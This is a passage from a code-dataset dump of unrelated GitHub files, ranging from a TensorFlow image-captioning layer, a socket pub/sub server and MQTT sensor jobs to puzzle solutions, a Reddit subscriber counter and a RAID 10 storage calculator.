ImageCaptioner(tf.keras.layers.Layer):\n\n def __init__(self, image_caption_cell, word_vocabulary, word_embeddings,\n beam_size=3, maximum_iterations=100, name=None, trainable=True, **kwargs ):\n self.image_caption_cell = image_caption_cell\n self.word_vocabulary = word_vocabulary\n self.beam_size = beam_size\n self.maximum_iterations = maximum_iterations\n self.vocab_size = word_embeddings.shape[0]\n self.embedding_size = word_embeddings.shape[1]\n super(ImageCaptioner, self).__init__(name=name, trainable=trainable, **kwargs)\n 
self.embeddings_map = tf.get_variable(\"embeddings_map\", dtype=tf.float32,\n initializer=tf.constant(word_embeddings, dtype=tf.float32))\n self.logits_layer = tf.layers.Dense(self.vocab_size, name=\"logits_layer\", \n kernel_initializer=tf.contrib.layers.xavier_initializer())\n \n def __call__(self, \n mean_image_features=None, \n mean_object_features=None, \n spatial_image_features=None, \n spatial_object_features=None, \n seq_inputs=None, lengths=None):\n assert(mean_image_features is not None or mean_object_features is not None or\n spatial_image_features is not None or spatial_object_features is not None)\n use_beam_search = (seq_inputs is None or lengths is None)\n if mean_image_features is not None:\n batch_size = tf.shape(mean_image_features)[0]\n elif mean_object_features is not None:\n batch_size = tf.shape(mean_object_features)[0]\n elif spatial_image_features is not None:\n batch_size = tf.shape(spatial_image_features)[0]\n spatial_image_features = collapse_dims(spatial_image_features, [1, 2])\n mean_image_features = tf.reduce_mean(spatial_image_features, [1])\n elif spatial_object_features is not None:\n batch_size = tf.shape(spatial_object_features)[0] \n spatial_object_features = collapse_dims(spatial_object_features, [2, 3])\n mean_object_features =tf.reduce_mean(spatial_object_features, [2])\n initial_state = self.image_caption_cell.zero_state(batch_size, tf.float32)\n if use_beam_search:\n if mean_image_features is not None:\n mean_image_features = seq2seq.tile_batch(mean_image_features, \n multiplier=self.beam_size)\n self.image_caption_cell.mean_image_features = mean_image_features\n if mean_object_features is not None:\n mean_object_features = seq2seq.tile_batch(mean_object_features, \n multiplier=self.beam_size)\n self.image_caption_cell.mean_object_features = mean_object_features\n if spatial_image_features is not None:\n spatial_image_features = seq2seq.tile_batch(spatial_image_features, \n multiplier=self.beam_size)\n self.image_caption_cell.spatial_image_features = spatial_image_features\n if spatial_object_features is not None:\n spatial_object_features = seq2seq.tile_batch(spatial_object_features, \n multiplier=self.beam_size)\n self.image_caption_cell.spatial_object_features = spatial_object_features\n initial_state = seq2seq.tile_batch(initial_state, multiplier=self.beam_size)\n decoder = seq2seq.BeamSearchDecoder(self.image_caption_cell, self.embeddings_map, \n tf.fill([batch_size], self.word_vocabulary.start_id), self.word_vocabulary.end_id, \n initial_state, self.beam_size, output_layer=self.logits_layer)\n outputs, state, lengths = seq2seq.dynamic_decode(decoder, \n maximum_iterations=self.maximum_iterations)\n ids = tf.transpose(outputs.predicted_ids, [0, 2, 1])\n sequence_length = tf.shape(ids)[2]\n flat_ids = tf.reshape(ids, [batch_size * self.beam_size, sequence_length])\n seq_inputs = tf.concat([\n tf.fill([batch_size * self.beam_size, 1], self.word_vocabulary.start_id), flat_ids], 1)\n if mean_image_features is not None:\n self.image_caption_cell.mean_image_features = mean_image_features\n if mean_object_features is not None:\n self.image_caption_cell.mean_object_features = mean_object_features\n if spatial_image_features is not None:\n self.image_caption_cell.spatial_image_features = spatial_image_features\n if spatial_object_features is not None:\n self.image_caption_cell.spatial_object_features = spatial_object_features \n activations, _state = tf.nn.dynamic_rnn(self.image_caption_cell, \n tf.nn.embedding_lookup(self.embeddings_map, seq_inputs),\n 
sequence_length=tf.reshape(lengths, [-1]), initial_state=initial_state)\n logits = self.logits_layer(activations)\n if use_beam_search:\n length = tf.shape(logits)[1]\n logits = tf.reshape(logits, [batch_size, self.beam_size, length, self.vocab_size])\n return logits, tf.argmax(logits, axis=-1, output_type=tf.int32)\n \n @property\n def trainable_variables(self):\n return (self.image_caption_cell.trainable_variables \n + self.logits_layer.trainable_variables \n + [self.embeddings_map])\n \n @property\n def trainable_weights(self):\n return self.trainable_variables\n \n @property\n def variables(self):\n return (self.image_caption_cell.variables \n + self.logits_layer.variables \n + [self.embeddings_map])\n \n @property\n def weights(self):\n return self.variables\n ","repo_name":"brandontrabucco/detailed_captioning","sub_path":"detailed_captioning/layers/image_captioner.py","file_name":"image_captioner.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"3010493308","text":"from nltk.corpus import stopwords\n\ncachedStopWords = stopwords.words(\"english\")\n\ndef removeStop(text):\n\t#text = 'hello bye the the hi'\n\ttext = ' '.join([word for word in text.read().split() if word not in cachedStopWords])\n\ttext_file = open(\"Output.txt\", \"w\")\n\ttext_file.write(\"%s\" % text)\n\ttext_file.close()\n\ntext = open('abs.txt','r')\n\nremoveStop(text)","repo_name":"Prateek2901/StopWords_Extraction","sub_path":"stopwords.py","file_name":"stopwords.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7547697483","text":"import socket\nimport argparse\nfrom threading import Thread, Event, Lock, Timer\nimport json\n\n\nclass Client(Thread):\n def __init__(self, conn, index, cb_close, cb_msg):\n Thread.__init__(self)\n self._conn = conn\n self._index = index\n self._signal = Event()\n self._cb_close = cb_close\n self._cb_msg = cb_msg\n\n @property\n def index(self):\n return self._index\n\n def stop(self):\n self._signal.set()\n\n def send_msg(self, msg):\n self._conn.sendall(msg.encode('utf-8'))\n return\n\n def run(self):\n self._conn.settimeout(0.1)\n while not self._signal.is_set():\n try:\n data = self._conn.recv(1024)\n if data == b'':\n print(f\"client#{self._index} disconnected\")\n self._cb_close(self)\n break\n self._cb_msg(self, data.decode())\n except socket.timeout:\n continue\n except:\n print(f\"client#{self._index} disconnected yep\")\n self._cb_close(self)\n break\n self._conn.close()\n\n\nclass ConnectHandler:\n def __init__(self):\n self._threads = {}\n self._topics = {}\n self._index = 0\n self._mutex = Lock()\n\n def remove_clients(self):\n print(\"remove clients\")\n for _, thread in self._threads.items():\n if thread.is_alive():\n thread.stop()\n thread.join()\n\n def _erase_client(self, index):\n try:\n thread = self._threads[index]\n if thread.is_alive():\n thread.stop()\n thread.join()\n del self._threads[index]\n print(\"removed client#{}, total connections: {}\".format(index, len(self._threads)))\n except:\n print(\"client#{} already removed!\".format(index))\n\n def remove_client(self, client):\n removes = []\n for topic, indexes in self._topics.items():\n if client.index in indexes:\n with self._mutex:\n self._topics[topic].remove(client.index)\n print(f\"removed client#{client.index} from topic {topic}\")\n if not self._topics[topic]:\n removes.append(topic)\n for 
topic in removes:\n del self._topics[topic]\n print(f\"removed topic {topic}\")\n Timer(0.01, self._erase_client, args=[client.index,]).start()\n\n def _send_msg(self, client, status, msg):\n res = {\n \"status\": status,\n \"msg\": msg\n }\n client.send_msg(json.dumps(res))\n\n def _cmd_pub(self, client, cmd):\n if \"topic\" not in cmd.keys():\n self._send_msg(client, \"fail, \"\"missing topic\")\n return\n if \"msg\" not in cmd.keys():\n self._send_msg(client, \"fail\", \"missing message\")\n return\n topic = cmd['topic']\n msg = {\n \"action\": \"pub\",\n \"topic\": topic,\n \"msg\": cmd['msg']\n }\n if topic not in self._topics:\n msg['clients'] = 0\n self._send_msg(client, \"ok\", msg)\n else:\n res = {\n \"topic\": topic,\n \"msg\": cmd['msg']\n }\n with self._mutex:\n for index in self._topics[topic]:\n try:\n self._send_msg(self._threads[index], \"msg\", res)\n except:\n pass\n msg['clients'] = len(self._topics[topic])\n self._send_msg(client, \"ok\", msg)\n print('published message \"{}\" for {} clients on topic {}'.format(\n cmd['msg'], msg['clients'], topic\n ))\n\n\n def _cmd_sub(self, client, cmd):\n if \"topic\" not in cmd.keys():\n self._send_msg(client, \"fail\", \"missing topic\")\n return\n topic = cmd['topic']\n msg = {\n \"action\": \"sub\",\n \"topic\": topic\n }\n if topic not in self._topics:\n with self._mutex:\n self._topics[topic] = [client.index]\n print(f\"new topic {topic} with recipient client#{client.index}\")\n self._send_msg(client, \"ok\", msg)\n else:\n if client.index in self._topics[topic]:\n msg['msg'] = \"already subscribed\"\n self._send_msg(client, \"fail\", msg)\n else:\n with self._mutex:\n self._topics[topic].append(client.index)\n print(f\"add recipient client#{client.index} for topic {topic}\")\n self._send_msg(client, \"ok\", msg)\n\n def _cmd_unsub(self, client, cmd):\n if \"topic\" not in cmd.keys():\n self._send_msg(client, \"fail\", \"missing topic\")\n return\n topic = cmd['topic']\n msg = {\n \"action\": \"unsub\",\n \"topic\": topic\n }\n if topic not in self._topics:\n msg['msg'] = \"topic not found\"\n self._send_msg(client, \"fail\", msg)\n else:\n if client.index in self._topics[topic]:\n with self._mutex:\n self._topics[topic].remove(client.index)\n print(f\"removed client#{client.index} topic {topic}\")\n if not self._topics[topic]:\n del self._topics[topic]\n print(f\"removed topic {topic}\")\n self._send_msg(client, \"ok\", msg)\n else:\n msg['msg'] = \"topic not subscribed\"\n self._send_msg(client, \"fail\", msg)\n\n def _process_cmd(self, client, cmd):\n if \"cmd\" not in cmd.keys():\n self._send_msg(client, \"fail\", \"missing command\")\n return\n if cmd['cmd'] == \"pub\":\n self._cmd_pub(client, cmd)\n elif cmd['cmd'] == \"sub\":\n self._cmd_sub(client, cmd)\n elif cmd['cmd'] == \"unsub\":\n self._cmd_unsub(client, cmd)\n else:\n self._send_msg(client, \"fail\", \"undefined command\")\n\n def add_msg(self, client, msg):\n js = None\n try:\n js = json.loads(msg)\n except:\n self._send_msg(client, \"fail\", \"parsing error\")\n return\n self._process_cmd(client, js)\n\n def add_connection(self, conn):\n self._index += 1\n client = Client(conn, self._index, cb_close=self.remove_client, cb_msg=self.add_msg)\n client.start()\n self._threads[self._index] = client\n print(\"added client#{}, total connections: {}\".format(self._index, len(self._threads)))\n\n\nclass MQTTServer:\n def __init__(self, host, port):\n self._host = host\n self._port = port\n self._handler = ConnectHandler()\n\n def start(self):\n sock = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((self._host, self._port))\n sock.listen()\n print(f\"start listening connections in {self._host}:{self._port}\")\n try:\n while True:\n conn, addr = sock.accept()\n print(\"new connection, address {}:{}\".format(addr[0], addr[1]))\n self._handler.add_connection(conn)\n except KeyboardInterrupt:\n print(\"keyboard interrupt\")\n finally:\n self._handler.remove_clients()\n print(\"closing server\")\n sock.close()\n\n\ndef parse_args():\n argp = argparse.ArgumentParser()\n argp.add_argument('--host', type=str, default='127.0.0.1')\n argp.add_argument('--port', type=int, default=12346)\n args = argp.parse_args()\n return args.host, args.port\n\ndef main():\n host, port = parse_args()\n server = MQTTServer(host, port)\n server.start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Yarviz/mqttdemo","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1176370740","text":"def day13b_mod():\r\n f = open('input\\\\input13.txt', 'r')\r\n lines = [line.strip() for line in f.readlines()]\r\n f.close()\r\n \r\n firewalls = {}\r\n for line in lines:\r\n data = line.split(':')\r\n depth = int(data[0])\r\n rng = int(data[1])\r\n firewalls[depth] = rng\r\n \r\n caught = True\r\n t=0\r\n while caught:\r\n caught = False\r\n for layer in sorted(list(firewalls.keys())):\r\n rng = firewalls[layer]\r\n if (layer+t) % (2*(rng-1)) == 0:\r\n caught = True\r\n if caught:\r\n t+= 1\r\n return t\r\n \r\nprint(day13b_mod())","repo_name":"boneillhawk/advent2017","sub_path":"day13b_mod.py","file_name":"day13b_mod.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4539451778","text":"class Solution(object):\n def palindromePairs(self, words):\n res = []\n if not words:\n return res\n\n d = {}\n for i in range(len(words)):\n d[words[i]] = i\n\n if \"\" in d:\n blankIndex = d[\"\"]\n for i in range(len(words)):\n if (self.isPalindrome(words[i])):\n if i == blankIndex:\n continue\n res.append([blankIndex, i])\n res.append([i, blankIndex])\n\n for i in range(len(words)):\n curr = words[i]\n curr_r = curr[::-1]\n if curr_r in d and d[curr_r] != i:\n res.append([i, d[curr_r]])\n\n for i in range(len(words)):\n curr = words[i]\n for cut in range(1, len(curr)):\n if self.isPalindrome(curr[:cut]):\n curr_r = (curr[cut:])[::-1]\n if curr_r in d and d[curr_r] != i:\n res.append([d[curr_r], i])\n\n if self.isPalindrome(curr[cut:]):\n curr_r = (curr[:cut])[::-1]\n if curr_r in d and d[curr_r] != i:\n res.append([i, d[curr_r]])\n\n return res\n\n def isPalindrome(self, s):\n i, j = 0, len(s) - 1\n while i <= j:\n if s[i] != s[j]:\n return False\n i += 1\n j -= 1\n return True\n\n\na = Solution().palindromePairs([\"abcd\",\"dcba\",\"lls\",\"s\",\"sssll\"])\nprint(a)","repo_name":"robbyvan/looseCannon","sub_path":"String/336_palindromePairs.py","file_name":"336_palindromePairs.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73962996003","text":"import numpy as np\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nfrom keras.utils import plot_model\nfrom keras.models import Model\nfrom keras import layers\n\nfrom 
keras.layers.merge import add\n\n# Image captioning model calss\nclass MLModel:\n def __init__(self, vocab_size, max_length, tokenizer):\n self.model = self._define_model(vocab_size, max_length, tokenizer)\n\n # define the captioning model\n def _define_model(self, vocab_size, max_length, tokenizer):\n # image feature extractor model\n image_input = layers.Input(shape=(4096,)) # 4069 is the output dim of the last VGG16 dense layer\n image_1 = layers.Dropout(0.5)(image_input)\n image_2 = layers.Dense(256, activation='relu')(image_1)\n # language sequence model\n embedding_matrix, embedding_dim = self._gen_embedding(tokenizer, vocab_size)\n language_input = layers.Input(shape=(max_length,))\n language_1 = layers.Embedding(vocab_size, 256, mask_zero=True)(language_input)\n language_2 = layers.Dropout(0.5)(language_1)\n language_3 = layers.LSTM(256)(language_2)\n # decoder model\n decoder1 = add([image_2, language_3])\n decoder2 = layers.Dense(25, activation='relu')(decoder1)\n output = layers.Dense(vocab_size, activation='softmax')(decoder2)\n\n model = Model(inputs=[image_input, language_input], outputs=output)\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n model.summary()\n plot_model(model, to_file='model.png', show_shapes=True)\n return model\n\n def _gen_embedding(self, tokenizer, vocab_size):\n \"\"\"\n Generate the embedding_matrix and embedding_dim from a given pretrained GLOVE embedding model\n :param tokenizer: tokenizer from the training data\n :return: (embedding_matrix, embedding_dim)\n \"\"\"\n # Pretrained embedding\n pretrained_embedding_model_path = './glove.6B.100d.txt'\n embedding_dim = 100 # fixed by glove.6B. This number can be obtained from the vector size in file\n\n embeddings_index = {}\n with open(pretrained_embedding_model_path, 'r') as f:\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n print('Found {} word vectors from model in {}.'.format(len(embeddings_index), pretrained_embedding_model_path ))\n\n embedding_matrix = np.zeros((vocab_size, embedding_dim))\n for word, i in tokenizer.word_index.items():\n if i < vocab_size:\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n return embedding_matrix, embedding_dim\n\n def get_model(self):\n return self.model\n","repo_name":"chlin907/ImageCaptioningDeepLearning","sub_path":"image_captioning_utils/MLModel.py","file_name":"MLModel.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25434656236","text":"from sympy import Symbol\n\n\nclass GaugeGroup():\n realBasis = ''\n\n def __init__(self, name, gpType, idb):\n self.idb = idb\n self.name = name\n self.type = gpType.upper()\n self.abelian = False\n self.g = Symbol(f'g_{self.name}', real=True)\n\n if self.type == 'U1':\n self.dim = 1\n self.abelian = True\n self.latex = 'U(1)'\n return\n\n self.repDic = {}\n\n self.dim = idb.get(self.type, 'dim')\n self.rank = idb.get(self.type, 'rank')\n self.sName = idb.get(self.type, 'name')\n\n self.structureConstants = idb.get(self.type, 'struct')\n\n # Latex name\n for i, c in enumerate(self.type):\n if c.isdigit():\n break\n\n base, n = self.type[:i], self.type[i:]\n if base not in ('E', 'F', 'G'):\n self.latex = base + '(' + str(n) + ')'\n else:\n self.latex = base + '_{' + n + '}'\n\n def dimR(self, rep):\n if rep not in self.repDic:\n 
self.computeRepInfo(rep)\n return self.repDic[rep][0]\n\n def repMat(self, rep):\n if rep not in self.repDic:\n self.computeRepInfo(rep)\n return self.repDic[rep][3]\n\n def repName(self, rep):\n if rep not in self.repDic:\n self.computeRepInfo(rep)\n return self.repDic[rep][4]\n\n\n def computeRepInfo(self, rep, noRepMats=False):\n \"\"\" Compute some useful info about the rep \"\"\"\n labels = rep\n dim = self.idb.get(self.type, 'dimR', rep)\n if not noRepMats:\n repMats = self.idb.get(self.type, 'repMatrices', rep, realBasis=self.realBasis)\n else:\n repMats = []\n fs = self.idb.get(self.type, 'frobenius', rep)\n tex = self.idb.get(self.type, 'repname', rep, latex=True)\n index = self.idb.get(self.type, 'dynkinIndex', rep)\n\n if fs == 1:\n repType = 'complex'\n elif fs == 0:\n repType = 'real'\n elif fs == -1:\n repType = 'pseudo-real'\n\n self.repDic[rep] = (dim, labels, repType, repMats, tex, index)\n\n\n def moreGroupInfo(self, N=10):\n \"\"\" Retrieve info about the first M irreps of the gauge group\n spanning the first possible N dimensions that the reps of the\n group may have (M >= N). \"\"\"\n\n try:\n self.idb.load()\n\n reps = self.idb.get(self.type, 'firstReps', N, table=False)\n\n # Compute rep info\n for r in reps:\n self.computeRepInfo(tuple(r), noRepMats=True)\n\n except SystemExit:\n exit()\n finally:\n self.idb.close()\n\n\n def copy(self):\n return GaugeGroup(self.name, self.type, self.idb)\n","repo_name":"LSartore/pyrate","sub_path":"src/Definitions/GaugeGroup.py","file_name":"GaugeGroup.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"1406190760","text":"#!/usr/bin/env python\nimport math\nimport Winding, Transformer, Machine\n\n# maybe like http://www.hammondmfg.com/pdf/EDB290AX.pdf\n\nprimary = Winding.Winding('p',120.0,0.0)\nsecondary5 = Winding.Winding('s',5.0,2.0)\nsecondary6 = Winding.Winding('s',6.3,2.0,taps=[50])\nsecondary300 = Winding.Winding('s',650.0,0.081,[50])\n\nt = Transformer.Transformer([secondary5,secondary6,primary,secondary300],90,have=1)\nt.circularMilsPerAmp = 600.0\nt.coreLoss = 0.66 # watts/lbs\nt.efficiency = 0.90 # 1/1.11 in wolpert p10\nt.lineFrequency = 60.0\nt.isolationThickness = 0.005\nt.stackingFactor = 0.92 # stacking factor wolpert p11 0.92 1x1 interleave, 0.95 butt stack\nt.lossFactor = 0.95 # 1/1.05 in wolpert p11\nt.wrappingThickness = 0.015\nt.WeightExtra = 1.15\n\n# t.laminationTable()\n\nt.fluxDensity = t.fluxFind(bmax=100000,inc=500)\n# t.fluxDensity = 70000\nt.compute()\nt.report()\n\n#t.fluxTable(sort='error')\n\nt.route()\nm = Machine.Machine(windings=t.windings)\nm.run()\n","repo_name":"holla2040/valvestudio","sub_path":"projects/transformerdesigner/power/650-5.0-6.3.py","file_name":"650-5.0-6.3.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"313034003","text":"#! 
/usr/bin/env python\n# encoding: utf-8\n\nimport waflib.Tools.asm\nfrom waflib.Tools import ar\ndef configure(conf):\n conf.find_program(conf.env.CC + ['gas','gcc'],var='AS')\n conf.env.AS_TGT_F=['-c','-o']\n conf.env.ASLNK_TGT_F=['-o']\n conf.find_ar()\n conf.load('asm')\n","repo_name":"cookingkode/nfv_platform","sub_path":"platform/waftools/myasm.py","file_name":"myasm.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70919452003","text":"import random\nimport heapq\n\n# 힙을 활용한 탐색\ndef solution(a):\n\n answer = 0 # 결과값\n min_idx = a.index(min(a)) # 가장 작은 숫자의 인덱스\n answer += 1\n heap_left, heap_right = [], [] # min_idx를 기준으로 왼쪽, 오른쪽\n\n # 만약 min_idx의 왼쪽이 없을 경우\n if min_idx == 0:\n for i in range(min_idx+1, len(a)):\n heap_right.append((a[i],i))\n # 만약 min_idx의 오른쪽이 없을 경우\n elif min_idx == len(a) - 1:\n for j in range(min_idx):\n heap_left.append((a[j],j))\n # min_idx의 왼쪽, 오른쪽\n else:\n for i in range(min_idx+1, len(a)):\n heap_right.append((a[i],i))\n for j in range(min_idx):\n heap_left.append((a[j],j))\n\n # 왼쪽, 오른쪽 heap정렬\n heapq.heapify(heap_left)\n heapq.heapify(heap_right)\n\n temp = 1000000 # 확인용 변수\n while heap_left:\n chk_lmin = heapq.heappop(heap_left)\n chk_idx = chk_lmin[1]\n # 가장 작은 값 인덱스가 0인 경우\n if chk_idx == 0:\n answer += 1\n break\n # heap에서 가장 작은 값은 이전 값보다 왼쪽에 있어야함.\n elif chk_idx < temp:\n answer += 1\n temp = chk_idx\n\n temp2 = 0 # 확인용 변수\n while heap_right:\n chk_rmin = heapq.heappop(heap_right)\n chk_idx = chk_rmin[1]\n # 가장 작은 값 인덱스가 마지막인 경우\n if chk_idx == len(a) - 1:\n answer += 1\n break\n # heap에서 가장 작은 값은 이전 값보다 오른쪽에 있어야 함.\n elif chk_idx > temp2:\n temp2 = chk_idx\n answer += 1\n return answer\n\n# 단순 계�� 알고리즘(완전탐색)\ndef solution2(a):\n answer = 0\n\n minimum = min(a)\n min_idx = a.index(minimum)\n answer += 1\n min_lidx, min_ridx = 0, len(a) - 1\n\n if min_idx == 0:\n min_ridx = a.index(min(a[min_idx+1:]))\n answer += 1\n elif min_idx == len(a) - 1:\n min_lidx = a.index(min(a[:min_idx]))\n answer += 1\n else:\n min_ridx = a.index(min(a[min_idx + 1:]))\n min_lidx = a.index(min(a[:min_idx]))\n answer += 2\n\n while min_lidx > 0:\n min_lidx = a.index(min(a[:min_lidx]))\n answer += 1\n\n while min_ridx < len(a) - 1:\n min_ridx = a.index(min(a[min_ridx+1:]))\n answer += 1\n\n return answer\n\na = [-16,27,65,-2,58,-92,-71,-68,-61,-33]\nb = [9, -1, -5]\nc = [9, -1, -5, -2, -3]\nd = random.sample(range(-1000000,1000000),100)\n# print(len(d))\nprint(solution(d))\nprint(solution2(d))","repo_name":"hwan1753/algorithm","sub_path":"programmers/Pop the balloon.py","file_name":"Pop the balloon.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22540678795","text":"#!/usr/bin/python3\n\"\"\"A module containing function for working with number of subscribers\n\"\"\"\nimport requests\n\n\nURL = 'https://www.reddit.com'\n\n\ndef number_of_subscribers(subreddit):\n \"\"\"Retrives the number of subscibers in a given subreddit\n \"\"\"\n headers = {\n 'Accept': 'application/json',\n 'User-Agent': ' '.join([\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',\n 'AppleWebKit/537.36 (KHTML, like Gecko)',\n 'Chrome/112.0.0.0',\n 'Safari/537.36'\n ])\n }\n result = requests.get(\n '{}/r/{}/about/.json'.format(URL, subreddit),\n headers=headers,\n allow_redirects=False\n )\n if result.status_code == 200:\n return result.json()['data']['subscribers']\n return 
0\n","repo_name":"yobocode/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30746771399","text":"w = int(input())\nh = int(input())\n\narea = w * h\n\n\nwhile area > 0:\n piece = input()\n if area > 0 and piece == \"STOP\":\n print(f'{area} pieces are left.')\n break\n area -= int(piece)\nelse:\n print(f'No more cake left! You need {abs(area)} pieces more.')\n","repo_name":"paunovaeleonora/SoftUni-Python-Basics-2020","sub_path":"While-Loop/cake.py","file_name":"cake.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5739831868","text":"# -*- encoding: utf-8 -*-\n\nimport time\n\nfrom mqtt_client import MqttClient\nfrom soil_moisture import detect_dry_or_wet\nfrom stpi_config import stpi_config\nfrom local_config import local_conf\nfrom DHT11 import get_temp_humi\n\n\ndef sub_watering_cmd():\n \"\"\" 启动mqtt监听 \"\"\"\n\n mqtt_cli2 = MqttClient('sub_watering_cmd')\n mqtt_cli2.mqtt_connect()\n mqtt_cli2.mqtt_subscribe(local_conf.mqtt_broker['SUB_WATERING_TOPIC'])\n\n\ndef pub_soil_moisture():\n \"\"\" 发布土壤湿度信息 \"\"\"\n\n mqtt_cli = MqttClient('pub_soil_moisture')\n mqtt_cli.mqtt_connect()\n soil_moisture = detect_dry_or_wet() or '1'\n topic = local_conf.mqtt_broker['PUB_SOIL_MOISTURE_TOPIC_PREFIX'] +\\\n stpi_config.PLANT_ID +\\\n '/' +\\\n str(int(time.time()))\n mqtt_cli.mqtt_publish(topic, soil_moisture, qos=2)\n return\n\n\ndef pub_temp_humi():\n \"\"\" 发布温湿度信息 \"\"\"\n\n temp, humi = get_temp_humi()\n if not temp and not humi:\n return\n mqtt_cli = MqttClient('pub_soil_moisture')\n mqtt_cli.mqtt_connect()\n topic = local_conf.mqtt_broker['PUB_TEMP_HUMI_TOPIC_PREFIX'] +\\\n stpi_config.PLANT_ID +\\\n '/' +\\\n str(int(time.time()))\n payload = str(int(temp)) + '_' + str(int(humi))\n mqtt_cli.mqtt_publish(topic, payload, qos=2)\n return\n","repo_name":"Erhao/SevenThirtyPi","sub_path":"mqtt_jobs.py","file_name":"mqtt_jobs.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36388346866","text":"import numpy as np\nimport cv2\n\nSTART = \"start\"\nEND = \"endseq\"\n\n\nclass HandGestureType(object):\n TEST1 = 0\n TEST2 = 1\n TEST3 = 3\n TEST4 = 4\n TEST5 = 5\n\n names = {TEST1: \"test1\", TEST2: \"test2\", TEST3: \"test3\", TEST4: \"test4\", TEST5: \"test5\"}\n\n\nclass RouteGenerator(object):\n \"\"\" \"\"\"\n def __init__(self,\n pre_trained_embedding_file,\n hand_classif_model,\n hand_classif_weights,\n captioner_model,\n captioner_weights,\n config_file,\n max_depth=25):\n self.hand_classif_model = cv2.readNetFromTensorflow(hand_classif_model, hand_classif_weights)\n self.captioner_model = cv2.readNetFromTensorflow(captioner_model, hand_classif_weights)\n\n def generate_hand_gesture(self, depth_image, goal_track):\n \"\"\"\n \"\"\"\n height, width = depth_image.shape\n depth_image = cv2.cvtColor(depth_image, cv2.COLOR_GRAY2RGB)\n blob = cv2.dnn.blobFromImages(depth_image,\n 1.0 / 255,\n (128, 128),\n (0, 0, 0),\n swapRB=False,\n crop=False)\n goal = goal_track.bbox.features(width, height).astype(\"float32\")\n gesture_id = self.model.setInput([blob, goal])\n return gesture_id\n\n def generate_route_description(object, hand_gesture_id):\n \"\"\"\n \"\"\"\n 
pass\n","repo_name":"AndrewJSchoen/uwds3","sub_path":"src/pyuwds3/reasoning/grounding/route_generator.py","file_name":"route_generator.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"23767692761","text":"def calculate_raid10_storage():\n # Solicita ao usuário o número de discos\n num_disks = int(input(\"Digite o número de discos: \"))\n\n # Solicita ao usuário a capacidade do menor disco\n\n menor = float('inf')\n \n for i in range(num_disks):\n disco = int(input(f\"Digite o valor do disco {i+1}: \"))\n if disco < menor:\n menor = disco\n\n # Calcula a capacidade total de armazenamento em RAID 10\n total_capacity = menor * num_disks / 2\n\n # Imprime a capacidade total de armazenamento e a capacidade reservada para segurança\n print(f\"A capacidade total de armazenamento em RAID 10 é {total_capacity}TB.\")\n\n# Chama a função\ncalculate_raid10_storage()\n","repo_name":"DavidSilvaProgrammer/FACAPE-4P","sub_path":"Arquitetura/CalculaRaid10VariavelMenor.py","file_name":"CalculaRaid10VariavelMenor.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37625294953","text":"class Solution(object):\n def buddyStrings(self, A, B):\n \"\"\"\n :type A: str\n :type B: str\n :rtype: bool\n \"\"\"\n if len(A) != len(B):\n return False\n d = []\n for i in range(len(A)):\n if A[i] != B[i]:\n d.append(i)\n if len(d) > 2:\n return False\n if len(d) == 1:\n return False\n if len(d) == 2:\n return A[d[0]] == B[d[1]] and A[d[1]] == B[d[0]]\n c = collections.Counter(A)\n for k, v in c.items():\n if v > 1:\n return True\n return False\n","repo_name":"qianlongzju/Leet_Code","sub_path":"Algorithms/py/859.BuddyStrings.py","file_name":"859.BuddyStrings.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38997856822","text":"#Exercício 07\n#Classe Bichinho Virtual. 
